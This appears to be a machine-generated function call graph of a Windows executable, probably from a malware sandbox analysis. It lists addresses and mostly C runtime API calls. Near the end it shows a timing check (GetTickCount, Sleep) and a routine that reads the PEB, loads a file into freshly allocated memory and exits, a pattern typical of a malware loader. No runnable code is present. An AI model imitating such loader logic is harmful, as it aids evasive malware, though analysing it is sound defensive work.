_store_num _store_str 14312->14306 14313 402673 _signal 67 API calls 14318 40e267 14313->14318 14314->14311 14314->14317 14314->14323 14314->14327 14316 402673 _signal 67 API calls 14316->14318 14317->14312 14346 41365b 14317->14346 14322 4025f0 _signal 6 API calls 14318->14322 14320 40e30a 14319->14320 14321 40e2ae 14319->14321 14319->14323 14328 40e495 14320->14328 14321->14323 14321->14325 14322->14312 14323->14312 14323->14316 14324 40e495 _store_winword 125 API calls 14324->14312 14325->14312 14325->14313 14327->14312 14327->14324 14331 40e4b6 14328->14331 14329 4057a2 ___convertcp 5 API calls 14330 40e5db 14329->14330 14330->14327 14332 40aa9e _malloc 67 API calls 14331->14332 14333 40e5dd 14331->14333 14334 40e555 ___convertcp 14331->14334 14332->14334 14336 40e689 ___ascii_stricmp 14333->14336 14338 40b55a 77 API calls __isleadbyte_l 14333->14338 14339 40e7d1 14333->14339 14343 40e5c7 14333->14343 14334->14333 14335 40e583 14334->14335 14340 40c887 __freea 67 API calls 14335->14340 14337 40e0ad _expandtime 125 API calls 14336->14337 14337->14343 14338->14333 14341 40e7fd 14339->14341 14345 40e83b 14339->14345 14340->14343 14342 40b55a __isleadbyte_l 77 API calls 14341->14342 14342->14343 14343->14329 14344 40b55a __isleadbyte_l 77 API calls 14344->14345 14345->14343 14345->14344 14347 413667 _signal 14346->14347 14348 41369b _signal 14347->14348 14349 4059e4 __lock 67 API calls 14347->14349 14348->14312 14350 413678 14349->14350 14351 413689 14350->14351 14354 412f46 14350->14354 14407 4136a1 14351->14407 14355 412f52 _signal 14354->14355 14356 4059e4 __lock 67 API calls 14355->14356 14357 412f6d _expandtime 14356->14357 14410 412e1e 14357->14410 14360 412f91 14416 412dac 14360->14416 14362 402489 __invoke_watson 10 API calls 14362->14360 14364 412fac 14422 412de5 14364->14422 14365 402489 __invoke_watson 10 API calls 14365->14364 14368 412fc7 14428 40d9f8 14368->14428 14369 402489 __invoke_watson 10 API calls 14369->14368 14372 413f39 __getenv_helper_nolock 122 API calls 14373 412ff1 14372->14373 14374 413077 14373->14374 14379 412fff __setlocale_nolock 14373->14379 14375 41308d GetTimeZoneInformation 14374->14375 14377 404a01 ___wtomb_environ 67 API calls 14374->14377 14380 4130a0 WideCharToMultiByte 14375->14380 14386 41306f __tzset_nolock 14375->14386 14376 413028 _strlen 14382 404c68 __malloc_crt 67 API calls 14376->14382 14378 413086 14377->14378 14378->14375 14379->14376 14385 404a01 ___wtomb_environ 67 API calls 14379->14385 14379->14386 14383 413116 WideCharToMultiByte 14380->14383 14387 413036 _strlen 14382->14387 14383->14386 14385->14376 14433 4131f2 14386->14433 14387->14386 14388 407e9b _strcpy_s 67 API calls 14387->14388 14390 41305a 14388->14390 14390->14386 14392 402489 __invoke_watson 10 API calls 14390->14392 14392->14386 14393 407d4c __setlocale_nolock 67 API calls 14394 4131a8 14393->14394 14395 4131b9 14394->14395 14396 402489 __invoke_watson 10 API calls 14394->14396 14397 413883 _ProcessCodePage 91 API calls 14395->14397 14396->14395 14398 4131d2 14397->14398 14399 413227 14398->14399 14400 413883 _ProcessCodePage 91 API calls 14398->14400 14401 407d4c __setlocale_nolock 67 API calls 14399->14401 14404 413268 __tzset_nolock _signal 14399->14404 14403 413207 14400->14403 14402 413257 14401->14402 14402->14404 14405 402489 __invoke_watson 10 API calls 14402->14405 14403->14399 14406 413883 _ProcessCodePage 91 API calls 14403->14406 14404->14351 14405->14404 14406->14399 14437 4058f2 LeaveCriticalSection 14407->14437 14409 4136a8 14409->14348 14411 412e2d 14410->14411 14415 412e42 14410->14415 14412 402673 _signal 67 API calls 14411->14412 14413 412e32 14412->14413 14414 4025f0 _signal 6 API calls 14413->14414 14414->14415 14415->14360 14415->14362 14417 412dd0 14416->14417 14418 412dbb 14416->14418 14417->14364 14417->14365 14419 402673 _signal 67 API calls 14418->14419 14420 412dc0 14419->14420 14421 4025f0 _signal 6 API calls 14420->14421 14421->14417 14423 412e09 14422->14423 14424 412df4 14422->14424 14423->14368 14423->14369 14425 402673 _signal 67 API calls 14424->14425 14426 412df9 14425->14426 14427 4025f0 _signal 6 API calls 14426->14427 14427->14423 14429 404524 __getptd 67 API calls 14428->14429 14430 40d9fd 14429->14430 14431 40da1a 14430->14431 14432 4082cd _setlocale 75 API calls 14430->14432 14431->14372 14432->14431 14436 4058f2 LeaveCriticalSection 14433->14436 14435 413190 14435->14393 14435->14404 14436->14435 14437->14409 10979 4019e0 11016 402914 10979->11016 10981 4019ec GetStartupInfoW 10982 401a0f 10981->10982 11017 404878 HeapCreate 10982->11017 10985 401a5f 11019 4046e7 GetModuleHandleW 10985->11019 10989 401a70 __RTC_Initialize 11053 402b2c 10989->11053 10990 401970 _fast_error_exit 67 API calls 10990->10989 10992 401a7e 10993 401a8a GetCommandLineW 10992->10993 11122 4036c7 10992->11122 11068 40415d GetEnvironmentStringsW 10993->11068 10997 401a99 11076 4040af GetModuleFileNameW 10997->11076 10999 401aa3 11000 401aae 10999->11000 11001 4036c7 __amsg_exit 67 API calls 10999->11001 11080 403e71 11000->11080 11001->11000 11004 401abf 11093 4037fe 11004->11093 11005 4036c7 __amsg_exit 67 API calls 11005->11004 11007 401ac6 11008 4036c7 __amsg_exit 67 API calls 11007->11008 11009 401ad1 __wwincmdln 11007->11009 11008->11009 11099 401000 GetTickCount Sleep GetTickCount 11009->11099 11012 401b00 11132 4039db 11012->11132 11015 401b05 _signal 11016->10981 11018 401a53 11017->11018 11018->10985 11114 401970 11018->11114 11020 404702 11019->11020 11021 4046fb 11019->11021 11023 40486a 11020->11023 11024 40470c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11020->11024 11135 403697 11021->11135 11196 404387 11023->11196 11027 404755 TlsAlloc 11024->11027 11029 401a65 11027->11029 11030 4047a3 TlsSetValue 11027->11030 11029->10989 11029->10990 11030->11029 11031 4047b4 11030->11031 11139 4039f9 11031->11139 11036 404220 __encode_pointer 7 API calls 11037 4047d4 11036->11037 11038 404220 __encode_pointer 7 API calls 11037->11038 11039 4047e4 11038->11039 11040 404220 __encode_pointer 7 API calls 11039->11040 11041 4047f4 11040->11041 11158 405850 11041->11158 11048 40429b __decode_pointer 6 API calls 11049 404848 11048->11049 11049->11023 11050 40484f 11049->11050 11178 4043c4 11050->11178 11052 404857 GetCurrentThreadId 11052->11029 11526 402914 11053->11526 11055 402b38 GetStartupInfoA 11056 404cad __calloc_crt 67 API calls 11055->11056 11063 402b59 11056->11063 11057 402d77 _signal 11057->10992 11058 402cbe 11058->11057 11059 402cf4 GetStdHandle 11058->11059 11061 402d59 SetHandleCount 11058->11061 11062 402d06 GetFileType 11058->11062 11065 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11058->11065 11059->11058 11060 404cad __calloc_crt 67 API calls 11060->11063 11061->11057 11062->11058 11063->11057 11063->11058 11063->11060 11067 402c41 11063->11067 11064 402c6a GetFileType 11064->11067 11065->11058 11066 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11066->11067 11067->11057 11067->11058 11067->11064 11067->11066 11069 404172 11068->11069 11070 40416e 11068->11070 11071 404c68 __malloc_crt 67 API calls 11069->11071 11070->10997 11072 404193 11071->11072 11073 40419a FreeEnvironmentStringsW 11072->11073 11527 405290 11072->11527 11073->10997 11077 4040e4 _wparse_cmdline 11076->11077 11078 404c68 __malloc_crt 67 API calls 11077->11078 11079 404127 _wparse_cmdline 11077->11079 11078->11079 11079->10999 11081 403e89 _wcslen 11080->11081 11085 401ab4 11080->11085 11082 404cad __calloc_crt 67 API calls 11081->11082 11088 403ead _wcslen 11082->11088 11083 403f12 11084 404a01 ___wtomb_environ 67 API calls 11083->11084 11084->11085 11085->11004 11085->11005 11086 404cad __calloc_crt 67 API calls 11086->11088 11087 403f38 11089 404a01 ___wtomb_environ 67 API calls 11087->11089 11088->11083 11088->11085 11088->11086 11088->11087 11091 403ef7 11088->11091 11531 407f63 11088->11531 11089->11085 11091->11088 11092 402489 __invoke_watson 10 API calls 11091->11092 11092->11091 11094 40380c __IsNonwritableInCurrentImage 11093->11094 11540 40732a 11094->11540 11096 40382a __initterm_e 11098 403849 __IsNonwritableInCurrentImage __initterm 11096->11098 11544 407313 11096->11544 11098->11007 11100 401051 11099->11100 11102 40104c 11099->11102 11645 401906 11100->11645 11102->11012 11129 4039af 11102->11129 11105 401072 11661 4016c3 11105->11661 11107 40107e 11108 4017bb _fseek 105 API calls 11107->11108 11109 401091 VirtualAlloc 11108->11109 11674 401509 11109->11674 11115 401983 11114->11115 11116 40197e 11114->11116 11118 403a6b __NMSG_WRITE 67 API calls 11115->11118 11117 403c3c __FF_MSGBANNER 67 API calls 11116->11117 11117->11115 11119 40198b 11118->11119 11120 40371b _malloc 3 API calls 11119->11120 11121 401995 11120->11121 11121->10985 11123 403c3c __FF_MSGBANNER 67 API calls 11122->11123 11124 4036d1 11123->11124 11125 403a6b __NMSG_WRITE 67 API calls 11124->11125 11126 4036d9 11125->11126 11127 40429b __decode_pointer 6 API calls 11126->11127 11128 401a89 11127->11128 11128->10993 12592 403883 11129->12592 11131 4039c0 11131->11012 11133 403883 _doexit 67 API calls 11132->11133 11134 4039e6 11133->11134 11134->11015 11136 4036a2 Sleep GetModuleHandleW 11135->11136 11137 4036c0 11136->11137 11138 4036c4 11136->11138 11137->11136 11137->11138 11138->11020 11207 404292 11139->11207 11141 403a01 __init_pointers __initp_misc_winsig 11210 4071db 11141->11210 11144 404220 __encode_pointer 7 API calls 11145 403a3d 11144->11145 11146 404220 TlsGetValue 11145->11146 11147 404238 11146->11147 11148 404259 GetModuleHandleW 11146->11148 11147->11148 11149 404242 TlsGetValue 11147->11149 11150 404274 GetProcAddress 11148->11150 11151 404269 11148->11151 11155 40424d 11149->11155 11157 404251 11150->11157 11152 403697 __crt_waiting_on_module_handle 2 API calls 11151->11152 11156 40426f 11152->11156 11153 404284 RtlEncodePointer 11154 40428c 11153->11154 11154->11036 11155->11148 11155->11157 11156->11150 11156->11154 11157->11153 11157->11154 11159 40585b 11158->11159 11161 404801 11159->11161 11213 405b7c 11159->11213 11161->11023 11162 40429b TlsGetValue 11161->11162 11163 4042b3 11162->11163 11164 4042d4 GetModuleHandleW 11162->11164 11163->11164 11167 4042bd TlsGetValue 11163->11167 11165 4042e4 11164->11165 11166 4042ef GetProcAddress 11164->11166 11168 403697 __crt_waiting_on_module_handle 2 API calls 11165->11168 11169 4042cc 11166->11169 11171 4042c8 11167->11171 11170 4042ea 11168->11170 11169->11023 11172 404cad 11169->11172 11170->11166 11170->11169 11171->11164 11171->11169 11175 404cb6 11172->11175 11174 40482e 11174->11023 11174->11048 11175->11174 11176 404cd4 Sleep 11175->11176 11218 40ab68 11175->11218 11177 404ce9 11176->11177 11177->11174 11177->11175 11505 402914 11178->11505 11180 4043d0 GetModuleHandleW 11181 4043e0 11180->11181 11182 4043e6 11180->11182 11183 403697 __crt_waiting_on_module_handle 2 API calls 11181->11183 11184 404422 11182->11184 11185 4043fe GetProcAddress GetProcAddress 11182->11185 11183->11182 11186 4059e4 __lock 63 API calls 11184->11186 11185->11184 11187 404441 InterlockedIncrement 11186->11187 11506 404499 11187->11506 11190 4059e4 __lock 63 API calls 11191 404462 11190->11191 11509 408141 InterlockedIncrement 11191->11509 11193 404480 11521 4044a2 11193->11521 11195 40448d _signal 11195->11052 11197 404391 11196->11197 11198 40439d 11196->11198 11200 40429b __decode_pointer 6 API calls 11197->11200 11199 4043b1 TlsFree 11198->11199 11201 4043bf 11198->11201 11199->11201 11200->11198 11202 4058b7 DeleteCriticalSection 11201->11202 11203 4058cf 11201->11203 11204 404a01 ___wtomb_environ 67 API calls 11202->11204 11205 4058e1 DeleteCriticalSection 11203->11205 11206 4058ef 11203->11206 11204->11201 11205->11203 11206->11029 11208 404220 __encode_pointer 7 API calls 11207->11208 11209 404299 11208->11209 11209->11141 11211 404220 __encode_pointer 7 API calls 11210->11211 11212 403a33 11211->11212 11212->11144 11217 402914 11213->11217 11215 405b88 InitializeCriticalSectionAndSpinCount 11216 405bcc _signal 11215->11216 11216->11159 11217->11215 11219 40ab74 _signal 11218->11219 11220 40ab8c 11219->11220 11230 40abab _memset 11219->11230 11231 402673 11220->11231 11223 40ac1d RtlAllocateHeap 11223->11230 11227 40aba1 _signal 11227->11175 11230->11223 11230->11227 11237 4059e4 11230->11237 11244 40a6f0 11230->11244 11250 40ac64 11230->11250 11253 407b47 11230->11253 11256 4044ab GetLastError 11231->11256 11233 402678 11234 4025f0 11233->11234 11235 40429b __decode_pointer 6 API calls 11234->11235 11236 402600 __invoke_watson 11235->11236 11238 4059f9 11237->11238 11239 405a0c EnterCriticalSection 11237->11239 11298 405921 11238->11298 11239->11230 11241 4059ff 11241->11239 11242 4036c7 __amsg_exit 66 API calls 11241->11242 11243 405a0b 11242->11243 11243->11239 11245 40a71e 11244->11245 11246 40a7b7 11245->11246 11249 40a7c0 11245->11249 11493 409df7 11245->11493 11246->11249 11500 409ea7 11246->11500 11249->11230 11504 4058f2 LeaveCriticalSection 11250->11504 11252 40ac6b 11252->11230 11254 40429b __decode_pointer 6 API calls 11253->11254 11255 407b57 11254->11255 11255->11230 11270 404336 TlsGetValue 11256->11270 11259 404518 SetLastError 11259->11233 11260 404cad __calloc_crt 64 API calls 11261 4044d6 11260->11261 11261->11259 11262 40429b __decode_pointer 6 API calls 11261->11262 11263 4044f0 11262->11263 11264 4044f7 11263->11264 11265 40450f 11263->11265 11266 4043c4 __mtinit 64 API calls 11264->11266 11275 404a01 11265->11275 11268 4044ff GetCurrentThreadId 11266->11268 11268->11259 11269 404515 11269->11259 11271 404366 11270->11271 11272 40434b 11270->11272 11271->11259 11271->11260 11273 40429b __decode_pointer 6 API calls 11272->11273 11274 404356 TlsSetValue 11273->11274 11274->11271 11277 404a0d _signal 11275->11277 11276 404a86 __dosmaperr _signal 11276->11269 11277->11276 11279 4059e4 __lock 65 API calls 11277->11279 11287 404a4c 11277->11287 11278 404a61 HeapFree 11278->11276 11280 404a73 11278->11280 11284 404a24 ___sbh_find_block 11279->11284 11281 402673 _signal 65 API calls 11280->11281 11282 404a78 GetLastError 11281->11282 11282->11276 11283 404a3e 11294 404a57 11283->11294 11284->11283 11288 409ae1 11284->11288 11287->11276 11287->11278 11289 409dc2 ___sbh_heapmin 11288->11289 11290 409b20 11288->11290 11289->11283 11290->11289 11291 409d0c VirtualFree 11290->11291 11292 409d70 11291->11292 11292->11289 11293 409d7f VirtualFree HeapFree 11292->11293 11293->11289 11297 4058f2 LeaveCriticalSection 11294->11297 11296 404a5e 11296->11287 11297->11296 11299 40592d _signal 11298->11299 11300 405955 11299->11300 11301 40593d 11299->11301 11309 405963 _signal 11300->11309 11372 404c68 11300->11372 11326 403c3c 11301->11326 11307 405984 11313 4059e4 __lock 67 API calls 11307->11313 11308 405975 11312 402673 _signal 67 API calls 11308->11312 11309->11241 11312->11309 11315 40598b 11313->11315 11316 405993 11315->11316 11317 4059bf 11315->11317 11319 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11316->11319 11318 404a01 ___wtomb_environ 67 API calls 11317->11318 11325 4059b0 11318->11325 11320 40599e 11319->11320 11321 404a01 ___wtomb_environ 67 API calls 11320->11321 11320->11325 11323 4059aa 11321->11323 11324 402673 _signal 67 API calls 11323->11324 11324->11325 11378 4059db 11325->11378 11381 407f03 11326->11381 11329 403c50 11331 403a6b __NMSG_WRITE 67 API calls 11329->11331 11333 403c72 11329->11333 11330 407f03 __set_error_mode 67 API calls 11330->11329 11332 403c68 11331->11332 11334 403a6b __NMSG_WRITE 67 API calls 11332->11334 11335 403a6b 11333->11335 11334->11333 11336 403a7f 11335->11336 11337 407f03 __set_error_mode 64 API calls 11336->11337 11368 403bda 11336->11368 11338 403aa1 11337->11338 11339 403bdf GetStdHandle 11338->11339 11340 407f03 __set_error_mode 64 API calls 11338->11340 11342 403bed _strlen 11339->11342 11339->11368 11341 403ab2 11340->11341 11341->11339 11343 403ac4 11341->11343 11344 403c06 WriteFile 11342->11344 11342->11368 11343->11368 11387 407e9b 11343->11387 11344->11368 11347 403afa GetModuleFileNameA 11349 403b18 11347->11349 11354 403b3b _strlen 11347->11354 11351 407e9b _strcpy_s 64 API calls 11349->11351 11352 403b28 11351->11352 11352->11354 11355 402489 __invoke_watson 10 API calls 11352->11355 11353 403b7e 11412 407cd8 11353->11412 11354->11353 11403 407d4c 11354->11403 11355->11354 11359 403ba2 11362 407cd8 _strcat_s 64 API calls 11359->11362 11361 402489 __invoke_watson 10 API calls 11361->11359 11363 403bb6 11362->11363 11365 403bc7 11363->11365 11366 402489 __invoke_watson 10 API calls 11363->11366 11364 402489 __invoke_watson 10 API calls 11364->11353 11421 407b6f 11365->11421 11366->11365 11369 40371b 11368->11369 11459 4036f0 GetModuleHandleW 11369->11459 11374 404c71 11372->11374 11375 404ca7 11374->11375 11376 404c88 Sleep 11374->11376 11462 40aa9e 11374->11462 11375->11307 11375->11308 11377 404c9d 11376->11377 11377->11374 11377->11375 11492 4058f2 LeaveCriticalSection 11378->11492 11380 4059e2 11380->11309 11382 407f12 11381->11382 11383 402673 _signal 67 API calls 11382->11383 11386 403c43 11382->11386 11384 407f35 11383->11384 11385 4025f0 _signal 6 API calls 11384->11385 11385->11386 11386->11329 11386->11330 11388 407eac 11387->11388 11390 407eb3 11387->11390 11388->11390 11394 407ed9 11388->11394 11389 402673 _signal 67 API calls 11391 407eb8 11389->11391 11390->11389 11392 4025f0 _signal 6 API calls 11391->11392 11393 403ae6 11392->11393 11393->11347 11396 402489 11393->11396 11394->11393 11395 402673 _signal 67 API calls 11394->11395 11395->11391 11448 402400 11396->11448 11398 4024b6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11399 402592 GetCurrentProcess TerminateProcess 11398->11399 11401 402586 __invoke_watson 11398->11401 11450 4057a2 11399->11450 11401->11399 11402 4025af 11402->11347 11407 407d5e 11403->11407 11404 407d62 11405 402673 _signal 67 API calls 11404->11405 11406 403b6b 11404->11406 11411 407d7e 11405->11411 11406->11353 11406->11364 11407->11404 11407->11406 11409 407da8 11407->11409 11408 4025f0 _signal 6 API calls 11408->11406 11409->11406 11410 402673 _signal 67 API calls 11409->11410 11410->11411 11411->11408 11415 407cf0 11412->11415 11417 407ce9 11412->11417 11413 402673 _signal 67 API calls 11414 407cf5 11413->11414 11416 4025f0 _signal 6 API calls 11414->11416 11415->11413 11418 403b91 11416->11418 11417->11415 11419 407d24 11417->11419 11418->11359 11418->11361 11419->11418 11420 402673 _signal 67 API calls 11419->11420 11420->11414 11422 404292 ___crtMessageBoxW 7 API calls 11421->11422 11423 407b7f 11422->11423 11424 407c1a 11423->11424 11425 407b92 LoadLibraryA 11423->11425 11432 40429b __decode_pointer 6 API calls 11424->11432 11444 407c44 11424->11444 11426 407cbc 11425->11426 11427 407ba7 GetProcAddress 11425->11427 11426->11368 11427->11426 11429 407bbd 11427->11429 11428 407c6f 11430 40429b __decode_pointer 6 API calls 11428->11430 11433 404220 __encode_pointer 7 API calls 11429->11433 11430->11426 11431 40429b __decode_pointer 6 API calls 11441 407c87 11431->11441 11434 407c37 11432->11434 11435 407bc3 GetProcAddress 11433->11435 11436 40429b __decode_pointer 6 API calls 11434->11436 11437 404220 __encode_pointer 7 API calls 11435->11437 11436->11444 11438 407bd8 GetProcAddress 11437->11438 11439 404220 __encode_pointer 7 API calls 11438->11439 11440 407bed GetProcAddress 11439->11440 11442 404220 __encode_pointer 7 API calls 11440->11442 11441->11428 11443 40429b __decode_pointer 6 API calls 11441->11443 11445 407c02 11442->11445 11443->11428 11444->11428 11444->11431 11445->11424 11446 407c0c GetProcAddress 11445->11446 11447 404220 __encode_pointer 7 API calls 11446->11447 11447->11424 11449 40240c __VEC_memzero 11448->11449 11449->11398 11451 4057aa 11450->11451 11452 4057ac IsDebuggerPresent 11450->11452 11451->11402 11458 40579a 11452->11458 11455 40b153 SetUnhandledExceptionFilter UnhandledExceptionFilter 11456 40b170 __invoke_watson 11455->11456 11457 40b178 GetCurrentProcess TerminateProcess 11455->11457 11456->11457 11457->11402 11458->11455 11460 403704 GetProcAddress 11459->11460 11461 403714 ExitProcess 11459->11461 11460->11461 11463 40ab51 11462->11463 11473 40aab0 11462->11473 11464 407b47 _malloc 6 API calls 11463->11464 11465 40ab57 11464->11465 11467 402673 _signal 66 API calls 11465->11467 11466 403c3c __FF_MSGBANNER 66 API calls 11471 40aac1 11466->11471 11479 40ab49 11467->11479 11468 403a6b __NMSG_WRITE 66 API calls 11468->11471 11470 40ab0d RtlAllocateHeap 11470->11473 11471->11466 11471->11468 11472 40371b _malloc 3 API calls 11471->11472 11471->11473 11472->11471 11473->11470 11473->11471 11474 40ab3d 11473->11474 11475 407b47 _malloc 6 API calls 11473->11475 11477 40ab42 11473->11477 11473->11479 11480 40a9d5 11473->11480 11476 402673 _signal 66 API calls 11474->11476 11475->11473 11476->11477 11478 402673 _signal 66 API calls 11477->11478 11478->11479 11479->11374 11481 40a9e1 _signal 11480->11481 11482 40aa12 _signal 11481->11482 11483 4059e4 __lock 67 API calls 11481->11483 11482->11473 11484 40a9f7 11483->11484 11485 40a6f0 ___sbh_alloc_block 5 API calls 11484->11485 11486 40aa02 11485->11486 11488 40aa1b 11486->11488 11491 4058f2 LeaveCriticalSection 11488->11491 11490 40aa22 11490->11482 11491->11490 11492->11380 11494 409e0a HeapReAlloc 11493->11494 11495 409e3e HeapAlloc 11493->11495 11496 409e2c 11494->11496 11498 409e28 11494->11498 11497 409e61 VirtualAlloc 11495->11497 11495->11498 11496->11495 11497->11498 11499 409e7b HeapFree 11497->11499 11498->11246 11499->11498 11501 409ebe VirtualAlloc 11500->11501 11503 409f05 11501->11503 11503->11249 11504->11252 11505->11180 11524 4058f2 LeaveCriticalSection 11506->11524 11508 40445b 11508->11190 11510 408162 11509->11510 11511 40815f InterlockedIncrement 11509->11511 11512 40816c InterlockedIncrement 11510->11512 11513 40816f 11510->11513 11511->11510 11512->11513 11514 408179 InterlockedIncrement 11513->11514 11515 40817c 11513->11515 11514->11515 11516 408186 InterlockedIncrement 11515->11516 11518 408189 11515->11518 11516->11518 11517 4081a2 InterlockedIncrement 11517->11518 11518->11517 11519 4081b2 InterlockedIncrement 11518->11519 11520 4081bd InterlockedIncrement 11518->11520 11519->11518 11520->11193 11525 4058f2 LeaveCriticalSection 11521->11525 11523 4044a9 11523->11195 11524->11508 11525->11523 11526->11055 11528 4052a8 11527->11528 11529 4052cf __VEC_memcpy 11528->11529 11530 4041af 11528->11530 11529->11530 11530->11073 11532 407f74 11531->11532 11533 407f7b 11531->11533 11532->11533 11537 407fa7 11532->11537 11534 402673 _signal 67 API calls 11533->11534 11535 407f80 11534->11535 11536 4025f0 _signal 6 API calls 11535->11536 11538 407f8f 11536->11538 11537->11538 11539 402673 _signal 67 API calls 11537->11539 11538->11088 11539->11535 11541 407330 11540->11541 11542 404220 __encode_pointer 7 API calls 11541->11542 11543 407348 11541->11543 11542->11541 11543->11096 11547 4072d7 11544->11547 11546 407320 11546->11098 11548 4072e3 _signal 11547->11548 11555 403733 11548->11555 11554 407304 _signal 11554->11546 11556 4059e4 __lock 67 API calls 11555->11556 11557 40373a 11556->11557 11558 4071ec 11557->11558 11559 40429b __decode_pointer 6 API calls 11558->11559 11560 407200 11559->11560 11561 40429b __decode_pointer 6 API calls 11560->11561 11562 407210 11561->11562 11571 407293 11562->11571 11578 40c13b 11562->11578 11564 40727a 11565 404220 __encode_pointer 7 API calls 11564->11565 11566 407288 11565->11566 11569 404220 __encode_pointer 7 API calls 11566->11569 11567 407252 11567->11571 11572 404cf9 __realloc_crt 74 API calls 11567->11572 11573 407268 11567->11573 11568 40722e 11568->11564 11568->11567 11591 404cf9 11568->11591 11569->11571 11575 40730d 11571->11575 11572->11573 11573->11571 11574 404220 __encode_pointer 7 API calls 11573->11574 11574->11564 11641 40373c 11575->11641 11579 40c147 _signal 11578->11579 11580 40c174 11579->11580 11581 40c157 11579->11581 11583 40c1b5 HeapSize 11580->11583 11585 4059e4 __lock 67 API calls 11580->11585 11582 402673 _signal 67 API calls 11581->11582 11584 40c15c 11582->11584 11587 40c16c _signal 11583->11587 11586 4025f0 _signal 6 API calls 11584->11586 11588 40c184 ___sbh_find_block 11585->11588 11586->11587 11587->11568 11596 40c1d5 11588->11596 11595 404d02 11591->11595 11593 404d41 11593->11567 11594 404d22 Sleep 11594->11595 11595->11593 11595->11594 11600 40ac86 11595->11600 11599 4058f2 LeaveCriticalSection 11596->11599 11598 40c1b0 11598->11583 11598->11587 11599->11598 11601 40ac92 _signal 11600->11601 11602 40aca7 11601->11602 11603 40ac99 11601->11603 11604 40acba 11602->11604 11605 40acae 11602->11605 11606 40aa9e _malloc 67 API calls 11603->11606 11612 40ae2c 11604->11612 11635 40acc7 ___sbh_resize_block ___sbh_find_block 11604->11635 11607 404a01 ___wtomb_environ 67 API calls 11605->11607 11622 40aca1 __dosmaperr _signal 11606->11622 11607->11622 11608 40ae5f 11610 407b47 _malloc 6 API calls 11608->11610 11609 4059e4 __lock 67 API calls 11609->11635 11613 40ae65 11610->11613 11611 40ae31 HeapReAlloc 11611->11612 11611->11622 11612->11608 11612->11611 11614 40ae83 11612->11614 11616 407b47 _malloc 6 API calls 11612->11616 11619 40ae79 11612->11619 11615 402673 _signal 67 API calls 11613->11615 11617 402673 _signal 67 API calls 11614->11617 11614->11622 11615->11622 11616->11612 11618 40ae8c GetLastError 11617->11618 11618->11622 11621 402673 _signal 67 API calls 11619->11621 11623 40adfa 11621->11623 11622->11595 11623->11622 11625 40adff GetLastError 11623->11625 11624 40ad52 HeapAlloc 11624->11635 11625->11622 11626 40ada7 HeapReAlloc 11626->11635 11627 40a6f0 ___sbh_alloc_block 5 API calls 11627->11635 11628 40ae12 11628->11622 11631 402673 _signal 67 API calls 11628->11631 11629 405290 __VEC_memcpy _signal 11629->11635 11630 407b47 _malloc 6 API calls 11630->11635 11633 40ae1f 11631->11633 11632 40adf5 11634 402673 _signal 67 API calls 11632->11634 11633->11618 11633->11622 11634->11623 11635->11608 11635->11609 11635->11622 11635->11624 11635->11626 11635->11627 11635->11628 11635->11629 11635->11630 11635->11632 11636 409ae1 VirtualFree VirtualFree HeapFree ___sbh_free_block 11635->11636 11637 40adca 11635->11637 11636->11635 11640 4058f2 LeaveCriticalSection 11637->11640 11639 40add1 11639->11635 11640->11639 11644 4058f2 LeaveCriticalSection 11641->11644 11643 403743 11643->11554 11644->11643 11694 401840 11645->11694 11647 40105f 11648 4017bb 11647->11648 11652 4017c7 _signal 11648->11652 11649 4017d5 11650 402673 _signal 67 API calls 11649->11650 11653 4017da 11650->11653 11651 401803 12224 402833 11651->12224 11652->11649 11652->11651 11655 4025f0 _signal 6 API calls 11653->11655 11660 4017ea _signal 11655->11660 11660->11105 11662 4016cf _signal 11661->11662 11663 4016fa 11662->11663 11664 4016dd 11662->11664 11666 402833 __lock_file 68 API calls 11663->11666 11665 402673 _signal 67 API calls 11664->11665 11667 4016e2 11665->11667 11668 401702 11666->11668 11670 4025f0 _signal 6 API calls 11667->11670 11669 401526 __ftell_nolock 71 API calls 11668->11669 11671 40170e 11669->11671 11672 4016f2 _signal 11670->11672 12303 401727 11671->12303 11672->11107 12306 401473 11674->12306 11676 4010bd 11677 2408b7 11676->11677 11689 240a3b 11676->11689 12476 24005f GetPEB 11677->12476 11679 240927 12477 240838 11679->12477 11681 24092f 11682 2409c2 11681->11682 11683 2409de CreateFileW 11681->11683 11682->11102 11683->11682 11684 240a08 VirtualAlloc ReadFile 11683->11684 11684->11682 11687 240a35 11684->11687 11685 240a4e 11685->11102 11687->11685 11688 240ed7 ExitProcess 11687->11688 12490 24020a 11687->12490 11690 240a42 11689->11690 11691 240a4e 11690->11691 11692 24020a 14 API calls 11690->11692 11693 240ed7 ExitProcess 11690->11693 11691->11102 11692->11690 11697 40184c _signal 11694->11697 11695 40185f 11696 402673 _signal 67 API calls 11695->11696 11698 401864 11696->11698 11697->11695 11699 401895 11697->11699 11700 4025f0 _signal 6 API calls 11698->11700 11713 4033b9 11699->11713 11710 401874 _signal @_EH4_CallFilterFunc@8 11700->11710 11702 40189a 11703 4018a1 11702->11703 11704 4018ae 11702->11704 11707 402673 _signal 67 API calls 11703->11707 11705 4018d6 11704->11705 11706 4018b6 11704->11706 11731 403105 11705->11731 11708 402673 _signal 67 API calls 11706->11708 11707->11710 11708->11710 11710->11647 11714 4033c5 _signal 11713->11714 11715 4059e4 __lock 67 API calls 11714->11715 11725 4033d3 11715->11725 11716 403448 11749 4034e8 11716->11749 11717 40344f 11719 404c68 __malloc_crt 67 API calls 11717->11719 11721 403459 11719->11721 11720 4034dd _signal 11720->11702 11721->11716 11724 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11721->11724 11722 405921 __mtinitlocknum 67 API calls 11722->11725 11726 40347e 11724->11726 11725->11716 11725->11717 11725->11722 11752 402874 11725->11752 11757 4028e2 11725->11757 11727 403489 11726->11727 11728 40349c EnterCriticalSection 11726->11728 11729 404a01 ___wtomb_environ 67 API calls 11727->11729 11728->11716 11729->11716 11740 403128 __wopenfile 11731->11740 11732 403142 11734 402673 _signal 67 API calls 11732->11734 11733 403316 11733->11732 11737 403374 11733->11737 11735 403147 11734->11735 11736 4025f0 _signal 6 API calls 11735->11736 11739 4018e1 11736->11739 11764 406da0 11737->11764 11746 4018fc 11739->11746 11740->11732 11740->11733 11767 406f42 11740->11767 11743 406f42 __wcsnicmp 79 API calls 11744 40332e 11743->11744 11744->11733 11745 406f42 __wcsnicmp 79 API calls 11744->11745 11745->11733 12217 4028a6 11746->12217 11748 401904 11748->11710 11762 4058f2 LeaveCriticalSection 11749->11762 11751 4034ef 11751->11720 11753 402881 